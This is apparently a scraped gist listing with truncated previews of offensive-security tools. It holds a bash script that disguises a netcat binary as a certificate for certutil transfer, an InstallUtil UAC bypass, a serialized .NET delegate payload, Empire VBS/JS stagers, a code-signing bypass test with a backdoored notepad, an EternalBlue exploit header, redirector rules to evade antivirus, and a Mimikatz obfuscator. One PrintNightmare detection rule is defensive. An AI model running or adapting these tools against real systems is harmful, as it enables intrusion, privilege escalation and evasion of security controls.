This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# drop_binary.sh | |
# ./drop_binary.sh /usr/share/windows-binaries/nc.exe nc.txt | |
# certutil -decode encoded.txt decoded.bin | |
echo "-----BEGIN CERTIFICATE-----" > $2 | |
cat $1 | base64 >> $2 | |
echo "-----END CERTIFICATE-----" >> $2 | |
sed -i 's/^/echo /g' $2 && sed -i 's/$/ >> encoded.txt/g' $2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Linq; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using Microsoft.Win32; | |
/* | |
InstallUtil.exe C# version of Event Viewer UAC bypass |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, | |
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'VBS Launcher StarFighter', | |
'Author': ['Cn33liz'], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Host.Runspace.LanguageMode | |
Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1 | |
Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe | |
# Try to execute the script. Add-Type will fail. | |
Import-Module C:\Demo\bypass_test.psm1 | |
$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + | |
'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'JS Launcher StarFighter', | |
'Author': ['Cn33liz'], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 7/2008 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RewriteEngine On | |
# Uncomment the below line for verbose logging, including seeing which rule matched. | |
#LogLevel alert rewrite:trace5 | |
# BURN AV BURN | |
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device | |
RewriteCond expr "-R '54.0.0.0/8'" [OR] | |
RewriteCond expr "-R '52.0.0.0/8'" [OR] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
if [[ $# -le 1 ]] ; then | |
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1' | |
exit 1 | |
fi | |
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};} | |
cp $1 $2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
- PrinterNightmare CVE-2021-34527 Exploit Detection | |
- Created by Rahmat Nurfauzi (@infosecn1nja). | |
- This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2. | |
--> | |
<group name="sysmon,"> | |
<rule id="99948" level="15"> | |
<if_group>sysmon_event_11</if_group> | |
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field> | |
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field> |
OlderNewer